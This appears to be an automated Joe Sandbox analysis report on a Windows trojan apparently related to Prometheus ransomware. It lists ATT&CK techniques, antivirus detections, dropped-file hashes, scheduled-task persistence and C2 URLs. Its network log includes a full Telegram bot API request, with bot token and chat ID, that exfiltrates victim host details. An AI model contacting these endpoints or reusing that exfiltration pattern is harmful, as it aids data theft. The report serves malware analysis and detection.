              Source: Yara match, File source: Process Memory Space: lmXqPxTfNHomnnafzTOKZnFns.exe PID: 1704, type: MEMORYSTR
              Source: Yara match, File source: Process Memory Space: lmXqPxTfNHomnnafzTOKZnFns.exe PID: 5324, type: MEMORYSTR
              Source: Yara match, File source: dump.pcap, type: PCAP
              Source: Yara match, File source: 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: Idle.exe PID: 4476, type: MEMORYSTR
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | 11 Scripting | Valid Accounts | 241 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 2 Windows Service | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 2 Windows Service | 12 Process Injection | 4 Obfuscated Files or Information | Security Account Manager | 157 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 3 Software Packing | NTDS | 371 Security Software Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 133 Masquerading | Cached Domain Credentials | 261 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 261 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Process Injection | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              [Behavior graph: ID 1589210, Sample: 6uPVRnocVS.exe, Startdate: 11/01/2025, Architecture: WINDOWS, Score: 100]

              Source | Detection | Scanner | Label
              6uPVRnocVS.exe | 65% | Virustotal | -
              6uPVRnocVS.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby
              6uPVRnocVS.exe | 100% | Avira | VBS/Runner.VPG
              6uPVRnocVS.exe | 100% | Joe Sandbox ML | -
              Source | Detection | Scanner | Label
              C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe | 100% | Avira | HEUR/AGEN.1323984
              C:\Windows\LiveKernelReports\WinStore.App.exe | 100% | Avira | HEUR/AGEN.1323984
              C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe | 100% | Avira | VBS/Runner.VPG
              C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe | 100% | Avira | HEUR/AGEN.1323984
              C:\ProgramData\ssh\System.exe | 100% | Avira | HEUR/AGEN.1323984
              C:\Recovery\upfc.exe | 100% | Avira | HEUR/AGEN.1323984
              C:\Recovery\Idle.exe | 100% | Avira | HEUR/AGEN.1323984
              C:\Users\user\AppData\Local\Temp\e65pqCzUjZ.bat | 100% | Avira | BAT/Delbat.C
              C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe | 100% | Joe Sandbox ML | -
              C:\Windows\LiveKernelReports\WinStore.App.exe | 100% | Joe Sandbox ML | -
              C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe | 100% | Joe Sandbox ML | -
              C:\ProgramData\ssh\System.exe | 100% | Joe Sandbox ML | -
              C:\Recovery\upfc.exe | 100% | Joe Sandbox ML | -
              C:\Recovery\Idle.exe | 100% | Joe Sandbox ML | -
              C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe | 81% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
              C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe | 81% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
              C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe | 81% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
              C:\Program Files\Windows Defender\lmXqPxTfNHomnnafzTOKZnFns.exe | 81% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
              C:\ProgramData\ssh\System.exe | 81% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
              C:\Recovery\Idle.exe | 81% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
              C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe | 81% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
              C:\Recovery\upfc.exe | 81% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
              C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe | 81% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
              C:\Users\Default\lmXqPxTfNHomnnafzTOKZnFns.exe | 81% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
              C:\Windows\LiveKernelReports\WinStore.App.exe | 81% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
              C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe | 81% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label
              http://ns.adobe.hotosh#n | 0% | Avira URL Cloud | safe
              http://monrul3t.beget.tech/c243cb78.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&60bc32dfe02b37c4e360dca40128d82d=989faea0cce1115f683b114ca580d3df&9d38ba4b7300523a983f9d7476ad101b=QYlZ2YlVWOiVTYjF2N3MjNjFDNyMjYwEDZ3I2YmdjZzUmNidjY5ETZ&md25=UA&vb=r948xSj667Ud7PLnWmgd | 100% | Avira URL Cloud | malware
              http://monrul3t.beget.tech/ | 100% | Avira URL Cloud | malware
              http://ns.adobe.c.0/ti | 0% | Avira URL Cloud | safe
              http://ns.a.0/sTy#n | 0% | Avira URL Cloud | safe
              http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Zt | 100% | Avira URL Cloud | malware
              http://ns.photo/#n | 0% | Avira URL Cloud | safe
              http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N | 100% | Avira URL Cloud | malware
              http://monrul3t.beget.tech | 100% | Avira URL Cloud | malware
              http://ns.adoraw-se#n | 0% | Avira URL Cloud | safe
              http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&c9ac4e72985eee3d90507dfb878ca2be=QX9JSUNJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3IDNiR2NlZDZxQGZ3QDM2YzMyEmM1UjN0YDOjlTM4ITYyQmMlljZxIiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W | 100% | Avira URL Cloud | malware
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              monrul3t.beget.tech | 5.101.152.15 | true | true | - | unknown
              ipinfo.io | 34.117.59.81 | true | false | - | high
              api.telegram.org | 149.154.167.220 | true | false | - | high
              Name | Malicious | Antivirus Detection | Reputation
              http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N | true | Avira URL Cloud: malware | unknown
              https://api.telegram.org/bot7170051875:AAE6pL_pl17E85H-TlJS2rKEh_uqVfRc8Gk/sendPhoto?chat_id=5922069347&caption=%E2%9D%95%20Pipavsya%20%E2%9D%95%0A%E2%80%A2%20ID%3A%202068c5dd94a8a9c670748c61bdf89871812759c4%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20user%0A%E2%80%A2%20PC%20Name%3A%20035347%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%208.46.123.189%0A%E2%80%A2%20GEO%3A%20US%20%2F%20New%20York%20City%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CRecovery%5CIdle.exe | false | - | high
              https://ipinfo.io/json | false | - | high
              http://monrul3t.beget.tech/c243cb78.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&60bc32dfe02b37c4e360dca40128d82d=989faea0cce1115f683b114ca580d3df&9d38ba4b7300523a983f9d7476ad101b=QYlZ2YlVWOiVTYjF2N3MjNjFDNyMjYwEDZ3I2YmdjZzUmNidjY5ETZ&md25=UA&vb=r948xSj667Ud7PLnWmgd | true | Avira URL Cloud: malware | unknown
              http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&c9ac4e72985eee3d90507dfb878ca2be=QX9JSUNJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3IDNiR2NlZDZxQGZ3QDM2YzMyEmM1UjN0YDOjlTM4ITYyQmMlljZxIiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
5.101.152.15 | monrul3t.beget.tech | Russian Federation | 198610 | BEGET-ASRU | true
34.117.59.81 | ipinfo.io | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | false
                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1589210
                                                                Start date and time:2025-01-11 18:06:05 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 11m 29s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:43
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:6uPVRnocVS.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:7a193e404a6285a41aba3019479d1749.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@44/47@3/3
                                                                EGA Information:
                                                                • Successful, ratio: 16.7%
                                                                HCA Information:Failed
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                • Exclude process from analysis (whitelisted): Conhost.exe, upfc.exe
                                                                • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target Idle.exe, PID 2944 because it is empty
                                                                • Execution Graph export aborted for target Idle.exe, PID 4476 because it is empty
                                                                • Execution Graph export aborted for target System.exe, PID 3604 because it is empty
                                                                • Execution Graph export aborted for target lmXqPxTfNHomnnafzTOKZnFns.exe, PID 1704 because it is empty
                                                                • Execution Graph export aborted for target lmXqPxTfNHomnnafzTOKZnFns.exe, PID 5324 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                • Report size getting too big, too many NtOpenKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
12:07:16 | API Interceptor | 3474776x Sleep call for process: Idle.exe modified
17:07:08 | Task Scheduler | Run new task: Idle path: "C:\Recovery\Idle.exe"
17:07:08 | Task Scheduler | Run new task: IdleI path: "C:\Recovery\Idle.exe"
17:07:08 | Task Scheduler | Run new task: lmXqPxTfNHomnnafzTOKZnFns path: "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe"
17:07:08 | Task Scheduler | Run new task: lmXqPxTfNHomnnafzTOKZnFnsl path: "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe"
17:07:08 | Task Scheduler | Run new task: upfc path: "C:\Recovery\upfc.exe"
17:07:08 | Task Scheduler | Run new task: upfcu path: "C:\Recovery\upfc.exe"
17:07:08 | Task Scheduler | Run new task: WmiPrvSE path: "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe"
17:07:08 | Task Scheduler | Run new task: WmiPrvSEW path: "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe"
17:07:10 | Task Scheduler | Run new task: WinStore.App path: "C:\Windows\LiveKernelReports\WinStore.App.exe"
17:07:10 | Task Scheduler | Run new task: WinStore.AppW path: "C:\Windows\LiveKernelReports\WinStore.App.exe"
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with very long lines (351), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):351
                                                                                            Entropy (8bit):5.84600597303072
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mwYZvLUwCWRoSYCNxPQSht+4XVtWjXVIYx1+SADo8pCIXXM/dBPoC8pdWaqSvBi6:4hcWoSXfBy4XVqFt8pxXc/dAKnS5iWIu
                                                                                            MD5:E9FB402687901E2206FED4289C1600BA
                                                                                            SHA1:8049CEE73BD1D0526C90607A709C1ECFBFFBB5B4
                                                                                            SHA-256:63FDC6DE6FDBAF5BAD34CB19FD85369EF1E473B912D7284A92E5236E32F6F7F0
                                                                                            SHA-512:3E38F53067FFB3011AA2738EAE7556F7C95E952A5DA706CFB53A329DDBC5667B6300BBACE738BC38A65E720308A58C3B59ACB94FB5D5B49D1592643489874D31
                                                                                            Malicious:false
                                                                                            Preview:Xl4AIQFlUhdnxIXDbNNcGvZqKo1n3NsWQCqgPrGvYBM0NGk6DONQd7OmMNzeYbsHyHXuc0xtGbEFijdDD5kpAc2SxDUC1lW6SFBGtzeMbdJC3JEmuwad1DHWOE7Ygv1eEHwchWTObXOgS0Zn9rRFK3FP8p1o1Fppmp7vXlEXcMBdykDYpTYyewTLCgd2foWVsi4n2nQXn3m81laXlc9iq1LzVvt1IL2xzpvQqafCDBLkJVUbFGRCpyo0WESH4ZPbAzILzKqK77eppkqAbSvB4zHBB43mIYHovujUMIl5ZGFsT9LvXRpmnNgLrHK5QECiz035BWxTr0myuZrBtHO0sfBiNYmE7po
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................R...6......Np... ........@.. ....................................@..................................p..K.................................................................................... ............... ..H............text...TP... ...R.................. ..`.sdata.../.......0...V..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with very long lines (682), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):682
                                                                                            Entropy (8bit):5.86808476624592
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:23CXfSzMhRLCdH4K9qpFSpwnnjuoMt03V+hBhF3hAv/RrJMXGb27Iw483p+I:2CmMhRLCInSpwnjuoMt03Khov/DWGb2T
                                                                                            MD5:19E78BD0E13E45BCE524BCA417FB8DEC
                                                                                            SHA1:90FA51CCE26B1631E84AEFFE7BFAB9626A977A86
                                                                                            SHA-256:33EF7354FEB04736086FAF41629A592E1245382F5CECCCD21ECAA84182909000
                                                                                            SHA-512:B85ABC33937DF3AE60AD41548E9693CCCA328B4BBA765E777B790E8C7A3FB3FBF8A8CC686BFFB57416CAA0DC5A43A323ABC806047D0E803179095B344463596F
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................R...6......Np... ........@.. ....................................@..................................p..K.................................................................................... ............... ..H............text...TP... ...R.................. ..`.sdata.../.......0...V..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with very long lines (384), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):384
                                                                                            Entropy (8bit):5.820784120584832
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:HiVPBmU/uMFyroXudnDwGphJhkhB+QJK7yUKIQSPr583c17kH2ctWCKHDu35YACZ:CpBhuKyXdk+fiB+c8K4983soWdC/35CZ
                                                                                            MD5:9F4CF51F7C736776D025C8D7C0241D96
                                                                                            SHA1:913AC31715F252FB5F071224EDBAE46F0888133D
                                                                                            SHA-256:600B4020C460C9E536461611BE43AC0780AC7BF6E0911D0C48889317E11AF8F5
                                                                                            SHA-512:5F172544871A29297BF2AF2A12BFB14ED23CB31B43417BAA06F1A14AD2CBAAB1050BE66A1018F17A9679391529E7AFDAE2BAA126D8CF965CD523A41EEC5EA3BA
                                                                                            Malicious:false
                                                                                            Preview:QcOxsIv7GnvpKeetRKCSMYVLtz2FyJ0lq8FuJStyT8GtM4AEjPyPXpL1GCE3QqI6xK9LYtk8bO9OSl9zyyfjVlNAxOnGO0imzJ6B4zpzpzxJq6ifDPEcLjlL68XKGdtlpWYJo749Ip4fxDT0pID9vGbQivE5bftLGMdUhZ0FVFTfpFX3pgf8auzj4Ik328in6sZkj9SPR7oqw6lcXLQ49uvVW3aZy7MWgqi6qwTqNPqcGJx8hHfrrnnL7DNpj3aUvRJGXowl1kquESPNGb2qbep3CX9ninGUyVrzArk3V4zH63HoyAjHBt3QlPDAoJCNdW5slZMZ18Vhpi6JQVyiE9SFcaNvnkOM1lnj8YCYyJQCYVlDS4uTUeJeDzQLMbvQ
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................R...6......Np... ........@.. ....................................@..................................p..K.................................................................................... ............... ..H............text...TP... ...R.................. ..`.sdata.../.......0...V..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):189
                                                                                            Entropy (8bit):5.6833855810659735
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:mSRcaPDdvMeHe7iaWcq497kwv6Iq+FHAUA7sU/V+cDWs87OmROQBHn:mSR17dvxHdNo7ka6IBHXshU7OmR5x
                                                                                            MD5:50D16B77326BA7C4A1B7DA7B4B55EAAF
                                                                                            SHA1:244130519650AFEEB81A6931A8BA328060CA8C77
                                                                                            SHA-256:6E16FEADB42323C923EA7B7381A7DB77BAB763C3DE4C546A3974A8B8C5FE3BCE
                                                                                            SHA-512:8894D0275FADC29CBED5AE175501ED01134F1D9EB600AC95FD71987A5151A0A2A98CF05DC18C275A87F041F272F31988448616BFD9DCE2579154FAE416EE6636
                                                                                            Malicious:false
                                                                                            Preview:Uv7kM5rW9VSrZsEAoXrusAhoqEWgTj1NbO4lg1LNd25e0ZRKcI9xSvcTOT3IiLDZdFQKxdewMeRzFDyRxMDKjD4qwlWM8CoSzfAvJGW9nMlydmNKflVWH20aKjYLGRyJz9AkDCIqzEgWcGMJYMrWrSK7pjljsL2WYb8emnHcdogCVd7DXOx4kccgyC4db
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................R...6......Np... ........@.. ....................................@..................................p..K.................................................................................... ............... ..H............text...TP... ...R.................. ..`.sdata.../.......0...V..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\Desktop\6uPVRnocVS.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):32
                                                                                            Entropy (8bit):4.054229296672174
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:I5aREyR5AEn:I8jcEn
                                                                                            MD5:4D4409A367EF4772862BEA99E3E105B1
                                                                                            SHA1:EF19882A87BB8E86D100008E70F81D42C722BE9C
                                                                                            SHA-256:C0A3379F12D6D1B19373734F78EE5F83A30F09AD56D8B53ED68AD7FE1648EBD7
                                                                                            SHA-512:7851EC4BC41AEDA00384AAA3A6DB48C76F0BB4E7EA7F90172796014C2D69ED02E9FD0FB985A2E7371ABD58B1FD05C1E7FC8FBF243099932296B3C8DC5BEEB285
                                                                                            Malicious:false
                                                                                            Preview:"C:\\ProgramData\ssh\System.exe"
                                                                                            Process:C:\Users\user\Desktop\6uPVRnocVS.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
